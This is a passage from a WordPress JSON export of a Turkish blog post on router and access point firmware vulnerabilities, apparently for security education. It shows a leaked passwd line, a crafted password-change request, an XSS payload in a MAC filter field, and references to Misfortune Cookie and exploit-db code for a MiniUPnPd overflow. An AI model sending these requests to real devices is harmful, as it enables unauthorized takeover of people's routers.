color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">ap71:x:500:0:Linux User,,,:\/root:\/bin\/sh<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Zafiyet kullan\u0131c\u0131 ad\u0131, parola de\u011fi\u015ftirme \u015feklinde farkl\u0131 atak vekt\u00f6rleriyle istismar edilebilir.<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\u0130stek<\/span><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt;\">\n<table style=\"border-collapse: collapse; border: none; width: 624px;\">\n<colgroup>\n<col width=\"*\"\/><\/colgroup>\n<tbody readability=\"1.5\">\n<tr style=\"height: 0px;\" readability=\"5.5\">\n<td style=\"border-bottom: solid #000000 1px; border-left: solid #000000 1px; border-right: solid #000000 1px; border-top: solid #000000 1px; padding: 7px 7px 7px 7px; vertical-align: top;\" readability=\"8\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">http:\/\/192.168.178.2\/userRpm\/ChangeLoginPwdRpm.htm?oldname=admin&amp;oldpassword=XXXX&amp;newname=admin&amp;newpassword=XXXX<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">&amp;newpassword2=XXXX&amp;Save=Save<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Veya XSS ile MAC filtreleme ayarlar\u0131 de\u011fi\u015ftirilebilir.<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b style=\"font-weight: normal;\"><br \/><\/b><br \/>\n<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">\u0130stek<\/span><\/p>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"\/><\/p>\n<p><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt;\">\n<table style=\"border-collapse: collapse; border: none; width: 624px;\">\n<colgroup>\n<col width=\"*\"\/><\/colgroup>\n<tbody readability=\"1.5\">\n<tr style=\"height: 0px;\" readability=\"5.5\">\n<td style=\"border-bottom: solid #000000 1px; border-left: solid #000000 1px; border-right: solid #000000 1px; border-top: solid #000000 1px; padding: 7px 7px 7px 7px; vertical-align: top;\" readability=\"8\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">http:\/\/192.168.178.2\/userRpm\/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&amp;Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)&gt;&amp;<\/span><\/p>\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">Type=1&amp;entryEnabled=1&amp;Changed=0&amp;SelIndex=0&amp;Page=1&amp;vapIdx=1&amp;Save=Save<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-family: Arial, Helvetica, sans-serif;\"><br \/><\/span><\/div>\n<p>\n<b><span style=\"font-family: Arial, Helvetica, sans-serif;\">Misfortune Cookie<\/span><\/b><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt;\">\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\">CVE-2014-9222 kodlu misfortune cookie zafiyeti, sald\u0131rganlara AP \u00fczerinde kimlik do\u011frulamas\u0131z Administrator haklar\u0131 vermektedir. RomPager isimli g\u00f6m\u00fcl\u00fc web sunucuda ke\u015ffedilen bu zafiyet 200&#8217;den fazla modelde mevcuttur. Sald\u0131rganlar bu zafiyeti istismar ederek t\u00fcm trafi\u011fi izleyebilirler. [<\/span>Link<span style=\"background-color: white; color: #313447; line-height: 23.7999992370605px; text-align: justify;\">]<\/span><\/div>\n<p>\n<span style=\"background-color: white; line-height: 23.7999992370605px; text-align: justify;\"><span style=\"font-family: Arial, Helvetica, sans-serif;\"><b>UPNP<\/b><\/span><\/span><\/p>\n<div dir=\"ltr\" style=\"margin-left: 0pt; text-align: justify;\" readability=\"10.8493150685\">\n<p>\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><br \/>\nElektronik cihazlar\u0131n kolayca a\u011fa dahil olmas\u0131 ve birbirleriyle uyumlu \u00e7al\u0131\u015fabilmesi amac\u0131yla kullan\u0131lan bir servis olan UPnP \u00fczerinde de bilinen kritik bir zafiyet vard\u0131r. Bu zafiyet istismar edilerek WAN \u00fczerinden AP&#8217;ye uzaktan ba\u011flant\u0131 sa\u011flanabilir, cihazdan yap\u0131land\u0131rma dosyalar\u0131 \u00e7ekilebilir.\u00a0<\/span><\/p>\n<div class=\"p1\">\n<span style=\"background-color: transparent; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;\"><\/p>\n<p>BGA\u2019dan <span class=\"s1\">Onur ALANBEL<\/span>\u2019in MiniUPnPd \u00fczerindeki bir zafiyet i\u00e7in yazd\u0131\u011f\u0131 istismar kodu, T\u00fcrkiye\u2019de yayg\u0131n olarak kullan\u0131lan modemlere root haklar\u0131yla ba\u011flanarak t\u00fcm trafi\u011fi y\u00f6nlendirme, yap\u0131land\u0131rma dosyalar\u0131na eri\u015fim, vb. ataklar yap\u0131labilece\u011fini g\u00f6stermi\u015ftir. Bulunan y\u0131\u011f\u0131n ta\u015fmas\u0131 zafiyeti istismar edilerek tam yetkili eri\u015fim sa\u011flanan \u00f6rnek \u00e7al\u0131\u015fmaya https:\/\/www.exploit-db.com\/docs\/36806.pdf adresinden eri\u015filebilir. \u0130stismar kodlar\u0131na ise <span class=\"s1\">https:\/\/www.exploit-db.com\/exploits\/36839\/<\/span> bu ba\u011flant\u0131dan ula\u015f\u0131labilir.<\/span><\/div>\n<\/div>\n<\/div>\n<p>\n<a href=\"https:\/\/furkansandal.com\">Furkan SANDAL<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>AP\/Router \u00dczerinde \u00c7\u0131kan Zafiyetler Access Point arabirimi, yaz\u0131l\u0131m\u0131 (firmware) di\u011fer bir\u00e7ok a\u011f cihaz\u0131 gibi g\u00fcvenlik zafiyetleri bar\u0131nd\u0131rabilirler. Bu zafiyetler ve&#8230;<\/p>\n","protected":false},"author":1,"featured_media":494,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[78,76,88,89,26,83,81,79,82,77,80,84,85,87,86],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/fiziksel_guvenlik.jpg?fit=227%2C226&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-7X","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/493"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=493"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/493\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/494"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=493"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=493"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}